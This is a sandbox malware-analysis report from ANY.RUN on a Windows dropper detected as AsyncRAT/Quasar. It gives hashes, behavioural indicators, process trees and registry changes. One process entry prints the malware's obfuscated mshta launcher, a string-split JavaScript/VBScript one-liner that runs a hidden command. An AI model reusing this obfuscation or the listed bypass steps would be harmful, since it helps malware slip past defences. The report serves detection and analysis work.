File name:

9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe

Full analysis: https://app.any.run/tasks/3879d3ea-3c66-4b9d-9c38-cbd593cbf83f
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: March 09, 2024, 10:52:58
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
rat
asyncrat
remote
quasar
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5:

8338BBDD6AB3AD35C0FBFBEBE29813FE

SHA1:

39F017290209564E34EB7AEC80EB2A91A2F5D2D5

SHA256:

9BF5171DD1229EE3E488E3FD3D2A067A85E227D0ED54E1ED18BBC35A89F698B7

SSDEEP:

98304:ln2ocmU5GYnyNl8YqjV8pJWm6qK8C237bzg0ICYlngn81ISeo/yn8OJdx4tGHRyG:Y+XqDuo/Num/bXZ90U9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • powershell.exe (PID: 1996)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3220)
      • powershell.exe (PID: 1996)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3220)
      • powershell.exe (PID: 1996)

    • Known privilege escalation attack

      • dllhost.exe (PID: 4200)

    • Actions looks like stealing of personal data

      • svchost.exe (PID: 1760)

    • Application was injected by another process

      • lsass.exe (PID: 764)
      • svchost.exe (PID: 1180)
      • svchost.exe (PID: 452)
      • svchost.exe (PID: 588)
      • svchost.exe (PID: 1092)
      • svchost.exe (PID: 1236)
      • svchost.exe (PID: 1968)
      • svchost.exe (PID: 1448)
      • svchost.exe (PID: 1388)
      • svchost.exe (PID: 1888)
      • svchost.exe (PID: 1500)
      • svchost.exe (PID: 1640)
      • svchost.exe (PID: 1508)
      • svchost.exe (PID: 1776)
      • svchost.exe (PID: 1760)
      • svchost.exe (PID: 1768)
      • svchost.exe (PID: 1880)
      • svchost.exe (PID: 2120)
      • svchost.exe (PID: 1956)
      • svchost.exe (PID: 1656)
      • svchost.exe (PID: 1248)
      • svchost.exe (PID: 1320)
      • svchost.exe (PID: 1328)
      • svchost.exe (PID: 2456)
      • svchost.exe (PID: 2448)
      • spoolsv.exe (PID: 2692)
      • svchost.exe (PID: 2648)
      • svchost.exe (PID: 2508)
      • svchost.exe (PID: 2884)
      • dasHost.exe (PID: 2900)
      • svchost.exe (PID: 2320)
      • svchost.exe (PID: 2208)
      • svchost.exe (PID: 2216)
      • svchost.exe (PID: 2284)
      • svchost.exe (PID: 2360)
      • svchost.exe (PID: 2464)
      • svchost.exe (PID: 3068)
      • svchost.exe (PID: 3320)
      • svchost.exe (PID: 3292)
      • svchost.exe (PID: 3256)
      • svchost.exe (PID: 2432)
      • svchost.exe (PID: 3624)
      • svchost.exe (PID: 3308)
      • svchost.exe (PID: 3148)
      • svchost.exe (PID: 3580)
      • svchost.exe (PID: 2392)
      • svchost.exe (PID: 3104)
      • OfficeClickToRun.exe (PID: 3084)
      • svchost.exe (PID: 3652)
      • explorer.exe (PID: 4848)
      • svchost.exe (PID: 4864)
      • svchost.exe (PID: 5096)
      • dllhost.exe (PID: 5500)
      • ApplicationFrameHost.exe (PID: 6612)
      • dllhost.exe (PID: 5416)
      • svchost.exe (PID: 712)
      • svchost.exe (PID: 6808)
      • MoUsoCoreWorker.exe (PID: 6876)
      • svchost.exe (PID: 8)
      • svchost.exe (PID: 3696)
      • svchost.exe (PID: 4228)
      • svchost.exe (PID: 4456)
      • svchost.exe (PID: 4604)
      • svchost.exe (PID: 4488)
      • ctfmon.exe (PID: 4680)
      • svchost.exe (PID: 4612)
      • dllhost.exe (PID: 6084)
      • SppExtComObj.Exe (PID: 1524)
      • svchost.exe (PID: 7020)
      • svchost.exe (PID: 892)
      • svchost.exe (PID: 6964)
      • svchost.exe (PID: 6692)
      • slui.exe (PID: 5224)
      • slui.exe (PID: 5492)
      • WmiPrvSE.exe (PID: 4412)
      • WaaSMedicAgent.exe (PID: 2936)
      • svchost.exe (PID: 680)
      • svchost.exe (PID: 7004)
      • UserOOBEBroker.exe (PID: 7064)
      • svchost.exe (PID: 7156)
      • svchost.exe (PID: 4888)
      • svchost.exe (PID: 6252)
      • slui.exe (PID: 944)
      • svchost.exe (PID: 7552)
      • svchost.exe (PID: 7584)

    • Runs injected code in another process

      • $sxr-powershell.exe (PID: 3220)

    • Starts PowerShell from an unusual location

      • $sxr-cmd.exe (PID: 2428)
      • $sxr-cmd.exe (PID: 5788)

    • ASYNCRAT has been detected (SURICATA)

      • $sxr-powershell.exe (PID: 3220)

    • QUASAR has been detected (SURICATA)

      • $sxr-powershell.exe (PID: 3220)

    • QUASAR has been detected (YARA)

      • $sxr-powershell.exe (PID: 3220)

  • SUSPICIOUS

    • Starts a Microsoft application from unusual location

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)

    • Process drops legitimate windows executable

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • powershell.exe (PID: 1996)

    • Starts CMD.EXE for commands execution

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • cmd.exe (PID: 3004)
      • dllhost.exe (PID: 4200)
      • cmd.exe (PID: 616)
      • $sxr-cmd.exe (PID: 2428)
      • $sxr-cmd.exe (PID: 5788)

    • Application launched itself

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)

    • Executing commands from a ".bat" file

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • dllhost.exe (PID: 4200)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)

    • The process creates files with name similar to system file names

      • powershell.exe (PID: 1996)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1996)

    • The process executes via Task Scheduler

      • $sxr-mshta.exe (PID: 456)

    • Reads security settings of Internet Explorer

      • $sxr-mshta.exe (PID: 456)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)

    • Reads Microsoft Outlook installation path

      • $sxr-mshta.exe (PID: 456)

    • Reads Internet Explorer settings

      • $sxr-mshta.exe (PID: 456)

    • Reads the date of Windows installation

      • $sxr-mshta.exe (PID: 456)

    • Starts itself from another location

      • $sxr-cmd.exe (PID: 2428)
      • $sxr-cmd.exe (PID: 5788)

    • Detected use of alternative data streams (AltDS)

      • svchost.exe (PID: 1760)

    • Creates file in the systems drive root

      • explorer.exe (PID: 4848)

    • Checks Windows Trust Settings

      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)

    • Cryptography encrypted command line is found

      • $sxr-cmd.exe (PID: 5788)

    • Hides command output

      • $sxr-cmd.exe (PID: 5788)

    • Get information on the list of running processes

      • $sxr-powershell.exe (PID: 3220)

    • The process checks if it is being run in the virtual environment

      • WmiPrvSE.exe (PID: 4412)

    • Adds/modifies Windows certificates

      • lsass.exe (PID: 764)

    • Connects to unusual port

      • $sxr-powershell.exe (PID: 3220)

  • INFO

    • Checks supported languages

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • $sxr-mshta.exe (PID: 456)
      • $sxr-cmd.exe (PID: 2428)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
      • $sxr-cmd.exe (PID: 5788)

    • Create files in a temporary directory

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)

    • Reads the software policy settings

      • lsass.exe (PID: 764)
      • WaaSMedicAgent.exe (PID: 2936)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
      • slui.exe (PID: 5492)
      • slui.exe (PID: 7244)

    • Reads the time zone

      • WmiPrvSE.exe (PID: 4412)

    • Checks transactions between databases Windows and Oracle

      • powershell.exe (PID: 3220)

    • Creates files in the program directory

      • powershell.exe (PID: 3220)
      • MoUsoCoreWorker.exe (PID: 6876)

    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 4200)

    • Reads Microsoft Office registry keys

      • OfficeClickToRun.exe (PID: 3084)

    • Process checks Internet Explorer phishing filters

      • $sxr-mshta.exe (PID: 456)

    • Reads the computer name

      • $sxr-mshta.exe (PID: 456)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
      • $sxr-cmd.exe (PID: 5788)
      • $sxr-cmd.exe (PID: 2428)

    • Reads Environment values

      • $sxr-mshta.exe (PID: 456)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)

    • Creates a writable file in the system directory

      • svchost.exe (PID: 1236)

    • Process checks computer location settings

      • $sxr-mshta.exe (PID: 456)

    • Reads the machine GUID from the registry

      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)

    • Process checks Powershell version

      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)

    • Reads Windows Product ID

      • WmiPrvSE.exe (PID: 4412)

    • Checks proxy server information

      • slui.exe (PID: 7244)
      • $sxr-powershell.exe (PID: 3220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 1980:11:30 13:15:57+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.13
CodeSize: 29696
InitializedDataSize: 11337216
UninitializedDataSize: -
EntryPoint: 0x79b0
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.17763.1
ProductVersionNumber: 11.0.17763.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.17763.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.17763.1
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
150
Monitored processes
104
Malicious processes
15
Suspicious processes
81

Behavior graph

Click at the process to see the details
start 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs wmiprvse.exe CMSTPLUA no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe waasmedicagent.exe svchost.exe $sxr-mshta.exe no specs $sxr-cmd.exe no specs conhost.exe no specs cmd.exe no specs #ASYNCRAT $sxr-powershell.exe $sxr-cmd.exe no specs cmd.exe no specs $sxr-powershell.exe no specs slui.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe lsass.exe svchost.exe slui.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe sppextcomobj.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe dashost.exe svchost.exe officeclicktorun.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe ctfmon.exe explorer.exe svchost.exe svchost.exe svchost.exe slui.exe dllhost.exe slui.exe dllhost.exe dllhost.exe svchost.exe applicationframehost.exe svchost.exe svchost.exe mousocoreworker.exe svchost.exe svchost.exe svchost.exe useroobebroker.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
8C:\WINDOWS\System32\svchost.exe -k LocalService -p -s LicenseManagerC:\Windows\System32\svchost.exe
services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
452C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s LSMC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\lsm.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
456C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bdwagIZyqMKABtRmRUfx4312:nXuWlSGO=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"C:\Windows\$sxr-mshta.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
588C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s gpsvcC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
616C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\IXP000.TMP\Update.bat" "C:\Windows\System32\cmd.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
680C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHostC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
712C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s AppinfoC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
764C:\WINDOWS\system32\lsass.exeC:\Windows\System32\lsass.exe
wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Local Security Authority Process
Exit code:
0
Version:
10.0.19041.1266 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\lsass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lsasrv.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
892C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s wlidsvcC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
944"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailableC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
Total events
53 807
Read events
53 268
Write events
333
Delete events
206

Modification events

(PID) Process:(892) svchost.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties
Operation:writeName:LID
Value:
0018000E203D7567
(PID) Process:(892) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
Operation:delete valueName:ClockSkew
Value:
↓￿
(PID) Process:(892) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
Operation:writeName:ClockTimeSeconds
Value:
973FEC6500000000
(PID) Process:(892) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
Operation:writeName:TickCount
Value:
7F820D0000000000
(PID) Process:(3308) svchost.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property
Operation:writeName:0018000E203D7567
Value:
0100000001000000D08C9DDF0115D1118C7A00C04FC297EB010000007F837A1C3D8F0B49BC83234E10CE2D220000000002000000000010660000000100002000000075873668878FA40B36717EE52537B11D01AB89D8CCAB924829ADD1E032A806F1000000000E800000000200002000000040E7A7F4D20C99A48E3EB6EF56CE1274C6D2B2F2774C89C4B1F9D6A09E8816748000000052EC867FCAC3B0C09EF4125AFF293EDAB55452A01466363B5A0F50C9652CE15CA0EA18EDD6454BC6D2C488D7535E2B3052D402DE155A0DAB6104330F6D2696A1FA332E0B97FBA6AB180DE02844B5D12D0CC06C06846A7AEAAFCAD4C0F37A4280C077F51925D1C604E991F9B676512C2AEF8D5B1E4094B8401CF352D434F6DD5640000000A2AF8E1B177A437197A7713EE6560B79D6295E6296C5A0A17C2084939FAE375462CA822FAC20B8FF1E2E6319BDCF09FE1808886804C15B6C1C073A74A144120E
(PID) Process:(3308) svchost.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189}
Operation:writeName:DeviceTicket
Value:
0100000001000000D08C9DDF0115D1118C7A00C04FC297EB010000007F837A1C3D8F0B49BC83234E10CE2D2200000000020000000000106600000001000020000000657B319F151EA2BD24247F80B3181D081D763FF60B8AAAD84D42D52E88E98025000000000E8000000002000020000000EA56E0EA331FD0137587A3F736D57F87C4B769982BD0EC21BB73BAF36D68BC41C00700006296688F87202FFF9602A3077E56283C4B88DE465E3BA46FADA746FBFABE6DEB2DFDD17523B777D6C1B45236A86ADCE9C27A124719C7018A4108867EEF9B13CAA4AA353BFC4A8AC95D9EB82842ACF7FBF67DAB2448C00F304BDD94FDC2A53E4D9254109EE63D89860A56C2188BF16B310CFB6A741CDC10C072A4786A9E07154E1FB5556C94952F03CA524DB01380E742B03F7500D8CA47FA0049E05AD0AD1A45703B61A73E9A091D1CB1FA32960E03A1F9345E1ECD4A645E193E94CCE046B96413487DA91EB1250A71B2C41C856B36C014D7D9D35208949C2D638EAAC8AB37F8B57602277F8981D4163E82C2BBE7042C6C8839E97A08E01D4347AC14EF83B05B4DF47124941A859D1E922CC49665E76745F3A228BDBDD5F4185366CD98F5269830BAC03FAA02553D24BDF5EEA682AE3EF45353F38186978829839779C5887FA4441D3E2AE3ADF59041BC4F7A4D1651FB9C4F160B69BAA19C20A4CD7EE6B6B339614FDCE98790A75AD8A7D0F6CFBADA035C34031EE625B6A30B737BB058142AD8146621CBF2FD1A71499F2EAE56E1B1AB3FB9F5208240FC7305E7A5028E7332954DC8F8442F68CAEB90F6CDB41B041897E28A84A7766D500C8C3BCF269C8ACC6AEAA2B96C653DD08183CCFD6C2A5EE23882CFB7D677E9523A25CCF2DC6325E255F8C4565376B218190F31AA53D76FDF937237DFF7AE80AF168D4ECDA5FA6D53C0159666C3D7AD4BE34B95F7AAF7F23E27181E2CD4F499CD951ECABED9619DB564DC717396838EDB4F0CE04251579A5F7D1B13B8DA33665A8921EEA8318B3A99E9AEA77525348F066EE9A8CDB5D949DD94DCD9371273C0E6C85BBAF7741E8A8AC5C3CCA3E4BC2B86BE343C03E2246BFBDA9B995BDFD517503247B1CE1FDBE545294304B853E9B9FAAFB80283C3C91FE5F8E78990D47ADB456DD622019C812CFB8604DEB3B09F3560532CDCCFDBBFBCCD4BFBCA12492C15F494FF00A897E621DD2489D65A684AF4F05EA6DDD5572525D31BE3D48DBF81F6EAB82ED718D765C00C2BA3258FBE159B4B97E6F2FB7AF3CF268509BB371F2AB61A39927633DD60F683E0C3F695D1D0D93BF0F8769E8A53E102BA0493D43A616F0907711815977DDD8E5E866F7DC19A1390A577213E3A5E410CE45DA9C2B5D9CDD1B1B8406900845370C4A7850A0D82C2AF076760019526B254E10E31305D02ED81683F2BE550F834EF0AFED95F8C0A2F086FB3499101523285AC1AC17C1FBD6EA4576023FF9875B0317D191A999EFEE03ADD8FAD6896A28BFF2BAE32ADE65F927E0DF62F75F311B0264C547C980AAE6E952F08D089CFBB3144B8BCBB4977F3550E9911644850ADA9ABAF161AE009903273842D07E1F278D18980FC00DD9A7FF62BE88463CCE0287E75A3830EBAF80E541012C71A6CF4E1A1DE45CE7683BE20E3EFED0B48849E97BC4B12A817A687AA1FF041BC26E7E8CB0ACCEEE5B0A3E9A22F5710C404E2D31FE1BE8ADC527CD1EEFE43B90D7058DE33B495D4266B421CC14D737ED3AB4D303A234DDC090199A92187E46B9832A4963C68DAB2FECA78EE00489BECDCBFAAD8E01A75508322DA187D73228AC631B01F7452456FE247F5B348A4280402A98C15C673CE8758FB9FFC7977037B505862A9FF8F45F61689213D7C0D9F9596AD47B96C743CF553AEF52B4923DB1D0D05CEFEFFA49229D1844895FB4C912F6881859C263D478BFC696684FD90F783B2781834C046BD396628A146CFD816C4FA575FADE322DCD041BA494FE78848A3BC2727EEF483568EFBA30B2B094E7701B8223D542E88E0583952AC2962A9A13A0D779615533CA8419F5ED6F8FE01FBD3DF5EFC4621F11EEA785BAA7813DC888ED8F10BE95B7FD04DE319BF54180CF8B54A934E699754222C5B22E17D4C571C1CC0A9AAE10CCD85769CE70AABC96CE72D6A2756AE71E1CE864520660E93BCF89474D44CBD65E4910760A24DC33781870E1325E87200C95CD5125B8BF406C43CAC91DF5D27978333AB33C3DFAF59CBBD6CBD470EB54E56611570890D43C05ABAC72A2CD491DF2A427095BCDA96EDBA424BB5053E06F5DBCFAA940FE182C4F452D520A7DC8E1FE6C8C48044A51900A64E1FA546204D839012E764F172FD9E64A972201C3DEB346966A323942BA538B8648B64E02869AFE8A835EF22F4E6D858E238C512344FEC7F0BF070F146F5D272AA0DD48B52CBFB1F0D80000314FD84468F645D3A80A1E0192D5BBCC5824853E44D30C1F37EE48021F96789A1F92D2BF186FA6F3B0B2843954EE0F07D2EDAE675A2E68F6F480176F623B1503F6857A0F5450E407BF24C6C1828747AA5B0947EBCD0624BF4D2A6D395110C4BD6A773827AB98B90B9C60EFB5451EA5E135EA12C39BC2B67E1B1BE3B3F132B69FF89337C7067327F9858CB9CB0EB995B21E94DDB553F964A81E66025D221506190141DEACBA6FFD571DAE0366B3B22824ED0448A3C522B5DB4EFDA849D4D9DF0FBF2F30D51895F7A7D6D692FE349E85ECDE47DBDF1677FDC16F3B2E1909349F47B9C331BB60E1829024F3A6D395F20ACE137EFB36B7DBFEFD274F8F31D9A128A43FB39FB3D2212678A1CB848D5386C68458C48608731B9856C14B6D4B304F57187B804E9B4F6790E6567C635E808D6D94274C7F3BEC469473F6F5513841770ED7A0553825089D4220082666A9A529FF88412815F4D704FA7A25995DB7420EB11056562A5E57F177F75E71232D1DC3C93638E71EB35DA2D42A342187F805B946CA0B762426A5776CAFB4C2C220F75404E5C52C82B982CFA486F85246EBBF7A840000000DE77FBBF1BE074DA41864F4B94D34E15010F5C64CA823197572F25F4FFDD5359878167D5AEC86C4B1B291D89D0B8BD005552F749519EF454BBF9D9DE867D2216
(PID) Process:(3308) svchost.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189}
Operation:writeName:DeviceId
Value:
0018000E203D7567
(PID) Process:(3308) svchost.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189}
Operation:writeName:ApplicationFlags
Value:
1
(PID) Process:(3220) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3220) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
3
Suspicious files
9
Text files
13
Unknown types
21

Dropped files

PID
Process
Filename
Type
65129bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\Update.bat
MD5:
SHA256:
1760svchost.exeC:\Windows\Prefetch\HOST.EXE-F5D74C61.pfbinary
MD5:D750ACA5D7942A7D0D48B3D62F2B31B7
